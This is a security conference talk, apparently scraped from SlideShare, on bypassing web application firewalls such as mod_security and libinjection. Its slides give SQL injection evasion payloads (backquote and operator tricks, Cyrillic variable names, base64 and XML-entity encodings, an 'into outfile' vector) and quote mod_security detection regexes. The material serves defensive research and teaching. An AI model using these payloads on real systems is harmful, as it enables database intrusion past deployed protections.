Artem Storozhuk "Building SQL firewall: insights from developers"Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"Fwdays
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levelsbeched
 
Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...
Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...
Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...MongoDB
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsPositive Hack Days
 
Don't Be Afraid of Abstract Syntax Trees
Don't Be Afraid of Abstract Syntax TreesDon't Be Afraid of Abstract Syntax Trees
Don't Be Afraid of Abstract Syntax TreesJamund Ferguson
 
Fosdem10
Fosdem10Fosdem10
Fosdem10wremes
 
A guided fuzzing approach for security testing of network protocol software
A guided fuzzing approach for security testing of network protocol softwareA guided fuzzing approach for security testing of network protocol software
A guided fuzzing approach for security testing of network protocol softwarebinish_hyunseok
 
ETL with SPARK - First Spark London meetup
ETL with SPARK - First Spark London meetupETL with SPARK - First Spark London meetup
ETL with SPARK - First Spark London meetupRafal Kwasny
 
Search for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code AnalysisSearch for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code AnalysisAndrey Karpov
 
Next Generation DevOps in Drupal: DrupalCamp London 2014
Next Generation DevOps in Drupal: DrupalCamp London 2014Next Generation DevOps in Drupal: DrupalCamp London 2014
Next Generation DevOps in Drupal: DrupalCamp London 2014Barney Hanlon
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.jsorkaplan
 

Similaire à Lie to Me: Bypassing Modern Web Application Firewalls (20)

Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
Memcached-инъекции - они существуют и работают, Иван Новиков (ONsec)
 
ELK stack at weibo.com
ELK stack at weibo.comELK stack at weibo.com
ELK stack at weibo.com
 
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL InjectionShmooCON 2009 : Re-playing with (Blind) SQL Injection
ShmooCON 2009 : Re-playing with (Blind) SQL Injection
 
Run Node Run
Run Node RunRun Node Run
Run Node Run
 
JSLT: JSON querying and transformation
JSLT: JSON querying and transformationJSLT: JSON querying and transformation
JSLT: JSON querying and transformation
 
Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"Artem Storozhuk "Building SQL firewall: insights from developers"
Artem Storozhuk "Building SQL firewall: insights from developers"
 
Vulnerabilities in data processing levels
Vulnerabilities in data processing levelsVulnerabilities in data processing levels
Vulnerabilities in data processing levels
 
Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...
Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...
Ensuring High Availability for Real-time Analytics featuring Boxed Ice / Serv...
 
Nodejs - A quick tour (v6)
Nodejs - A quick tour (v6)Nodejs - A quick tour (v6)
Nodejs - A quick tour (v6)
 
Vulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing LevelsVulnerabilities on Various Data Processing Levels
Vulnerabilities on Various Data Processing Levels
 
Don't Be Afraid of Abstract Syntax Trees
Don't Be Afraid of Abstract Syntax TreesDon't Be Afraid of Abstract Syntax Trees
Don't Be Afraid of Abstract Syntax Trees
 
Fosdem10
Fosdem10Fosdem10
Fosdem10
 
Solr @ Etsy - Apache Lucene Eurocon
Solr @ Etsy - Apache Lucene EuroconSolr @ Etsy - Apache Lucene Eurocon
Solr @ Etsy - Apache Lucene Eurocon
 
A guided fuzzing approach for security testing of network protocol software
A guided fuzzing approach for security testing of network protocol softwareA guided fuzzing approach for security testing of network protocol software
A guided fuzzing approach for security testing of network protocol software
 
ETL with SPARK - First Spark London meetup
ETL with SPARK - First Spark London meetupETL with SPARK - First Spark London meetup
ETL with SPARK - First Spark London meetup
 
Search for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code AnalysisSearch for Vulnerabilities Using Static Code Analysis
Search for Vulnerabilities Using Static Code Analysis
 
Next Generation DevOps in Drupal: DrupalCamp London 2014
Next Generation DevOps in Drupal: DrupalCamp London 2014Next Generation DevOps in Drupal: DrupalCamp London 2014
Next Generation DevOps in Drupal: DrupalCamp London 2014
 
introduction to node.js
introduction to node.jsintroduction to node.js
introduction to node.js
 
Angular2 for Beginners
Angular2 for BeginnersAngular2 for Beginners
Angular2 for Beginners
 
Price of an Error
Price of an ErrorPrice of an Error
Price of an Error
 

Dernier

Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024BookNet Canada
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Alan Dix
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphNeo4j
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 

Dernier (20)

Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
Transcript: #StandardsGoals for 2024: What’s new for BISAC - Tech Forum 2024
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...Swan(sea) Song – personal research during my six years at Swansea ... and bey...
Swan(sea) Song – personal research during my six years at Swansea ... and bey...
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
 
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge GraphSIEMENS: RAPUNZEL – A Tale About Knowledge Graph
SIEMENS: RAPUNZEL – A Tale About Knowledge Graph
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping Elbows
 

Lie to Me: Bypassing Modern Web Application Firewalls

  • 1. bypassing modern web application firewalls @ONsec_lab, http://lab.onsec.ru
  • 2. About • Security audits of webapps since 2009 • @d0znpp twitter • @ONsec_lab twitter • Nice blog! http://lab.onsec.ru - [ENG] • d0znpp[at]ONsec[dot]ru еmаi1
  • 3. WTF WAF? • Web Application Firewall • Prevent attacks • Attack !=Vulnerability • Risk != Attack
  • 4. SoftwareVS Hardware • Different HTTP parsers • Many «hardware» WAFs used Apache, Lighttpd, Nginx forks
  • 5. Implementation • Failover bypass: • DoS/DDoS WAF for bypass it- why not?! • What happens with traffic when your filter is overloaded? • XML, regexp, token bombs for this • Not so silently, right? :)
  • 6. WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
  • 7. WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
  • 9. Parse HTTP packets • First read: «Protocol-Level Evasion of Web Application Firewalls», Ivan Ristic, BH- US-2012 • Nice yesterday bypass Imperva by @webpentest during PHDays WAF bypass contest: Content-Type: invalid :))) • Classic example - HTTP Parameter Pollution • Are you sure that WAF’s and webapp’s HTTP protocols are the same?
  • 10. WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
  • 11. Data normalization level bug looks like tunnel
  • 12. Data normalization • Format parsers, for example: • base64 • xml • JSON • Are you sure that WAF’s and webapp’s parsers are the same?
  • 13. Data normalization • mod_security, t:base64decode • decode string until first = char • PHP, base64_decode($strict=false) • decode whole string • Attack vector • YWFh=attackhere • Use t:base64DecodeExt!
  • 14. Data normalization • Yet another example from yesterday PHDays WAF bypass contest - Imperva XML decoding • First decode XML, that validate attacks • XML input was not set up as XML type in WAF • Put attack as XML-encoded data (entities) to bypass regexpr: &#x75;nion select 123
  • 15. WAF work stages • Parse HTTP packet from client (web server to this in general case) • Determine rules that must be applied to current URL/client/hostname/etc • Normalize data (2-nd urldecode, base64, etc) • Do detection logic (such as regexpr) • Make detection decision (true/false/score)
  • 17. Detection logic • Regular expressions (mod_security, etc) • Tokenizers (libinjection) • ...
  • 18. SQL syntax • First read this works: • http://websec.wordpress.com/tag/sql- obfuscation/ • http://www.slideshare.net/nickgsuperstar/ new-techniques-in-sql-obfuscation • Obfuscated vector is more than welcome! • Try to exploit
  • 19. SQL syntax - time to fuzzing! • SELECT{$P1} 1 FROM... • ...UNION{$P2}FROM... • SELECT VERSION{$P3}() • SELECT{$P4}VERSION{P4}() • SELECT 1{P5}BAD
  • 20. MySQL: the classics • SELECT{U} 1 FROM • ...UNION{U}FROM... • SELECT VERSION{U}() • {U} = [0x09,0x0A-0x0D,0x20,0xA0]* • Fuzzed only 1-bytes sequences, not /**/, etc
  • 21. MySQL: time to fuzzing! • SELECT{F}VERSION{F}() • SELECT 1{D}BAD • {F} = {U} + 0x60 (backquote `) • {D} = # + 0x60 • Have a fun with regexp: • select`version` ( ) • ... where id=’1’`’ and ... - commented now
  • 22. MySQL: break tokens! • SELECT{O}1 FROM test • {O} = [-+!~@] • SELECT 1{W}FROM test; • {W} = [.d?|ed] • Part of this discovered during our WAF bypass contest last year by @Black2Fan
  • 23. MySQL: break tokens! • SELECT-1e1FROM test • SELECT~1.FROM test • SELECTNFROM test • SELECT@^1.FROM test • SELECT-id-1.FROM test • all tested on MySQL 5.1.66-0-squeeze1
  • 24. Postgres: the classics • SELECT{U} 1 FROM • ...UNION{U}FROM... • SELECT VERSION{U}() • {U} = [0x09,0x0A,0x0C,0x0D,0x20]* • Fuzzed only 1-bytes sequences, not /**/, etc
  • 25. Postgres: time to fuzz! • SELECT{F}VERSION{F}() • SELECT 1{D}BAD • {F} = {U} + 0x22 (doblequote ‘’) • {D} = # + 0x22 • Have a fun with regexp: • select’’version’’ ( ) • ... where id=’1’`’ and ... - commented now
  • 26. Postgres: break tokens! • SELECT{O}1 FROM test • {O} = [.-+!~@] - @ is absolute operator • SELECT 1{W}FROM test; • {W} = [.d?|ed|] - nothing is also OK!
  • 27. Postgres: break tokens! • SELECT-1ROM test • SELECT.1FROM test • SELECT~1FROM test • SELECT-id-1FROM test • SELECT-id-1FROM test • all tested on PostgreSQL 9.2.4
  • 28. Time to exploit! • mod_security • libinjection • others?
  • 30. mod_security • ?id=select id from test • ?id=select-id-1.from test Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:unions*?(?:all| d i s t i n c t | [ ( ! @ ] * ? ) ? s * ? [ ( [ ] * ? s * ? s e l e c t s + ) | ( ? : w + s + l i ke s + [ " ' ` xc2xb4xe2x80x99xe2x80x98])|(?:likes*?["'`xc2xb4xe2x80x99xe2x80x98]%)| (?:["'`xc2xb4xe2x80x99xe2x80x98]s*?likeW*?["'`xc2xb4 ..." at ARGS:id. [file "/ opt/modsecurity/rules/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "223"] [id "981245"] [msg "Detects basic SQL authentication bypass attempts 2/3"] [data "Matched Data: select id from found within ARGS:id: select id from test"] [severity "CRITICAL"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"]
  • 31. mod_security • ?id=1 or 1=1 or • ?id=1 or true or Message: Access denied with code 403 (phase 2). Pattern match "(?i:([s'"` x c 2 x b 4 x e 2 x 8 0 x 9 9 x e 2 x 8 0 x 9 8 ( ) ] * ? ) ( [ d w ] + + ) ( [ s ' " ` xc2xb4xe2x80x99xe2x80x98()]*?)(?:(?:=|<=>|r?like|soundss+like|regexp)([s'"` xc2xb4xe2x80x99xe2x80x98()]*?)2|(?:!=|<=|>=|<>|<|>|^|iss+not|not ..." at A R G S : i d . [ fi l e " / o p t / m o d s e c u r i t y / r u l e s / b a s e _ r u l e s / modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1=1 found within ARGS:id: 1 or 1=1 or "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.7"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/ WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/ 6.5.2"]
  • 32. libinjection • Token based detection • No more regexp! • Fingerprint for each attack 1-5 tokens sequence • 14 token types, 14^5+14^4+14^3+14^2+14 ~= 580k possible fingerprints • Is it enough to block all SQLi?
  • 33. libinjection • Bytes obfuscation doesn’t works now • But... • What happens if you missed some tokens?
  • 34. Attack #1. Missed token / fingerprint • As fuzzed above ` 0x60 byte can be used as a comment in MySQL and also as function quotes • ' into outfile 'asd' -- • block - skksc • ' into outfile 'asd' ` • bypass - skksn
  • 35. Attack #2.Token obfuscation • Find any unblocked fingerprint • Obfuscate your attack to produce the same fingerprint • Fingerprint have only 5 tokens • Need to exploit anti-obfuscation logic (1+1 and others hardcoded token combinations)
  • 36. Attack #2.Token obfuscation • Fingerprint «v1111» looks like safe • @a1a2a3a4 - variable but fingerprint of this string is «v», no numeric token here • @ф1й2у3ц4 - is valid variable for MySQL, but produce fingerprint «v1111» • @ф1й2у3ц4 union select ... produce fingerprint «v1111» also :)
  • 37. Some stats • Hacking WAFs since 2009 • About 50 different implementations • About 10 different engines • Time to hack: • min: 3 min • max: 19 hours • average: 1hour
  • 38. Questions? • @d0znpp twitter • @ONsec_lab twitter • Nice blog! http://lab.onsec.ru - [ENG] • d0znpp[at]ONsec[dot]ru еmаi1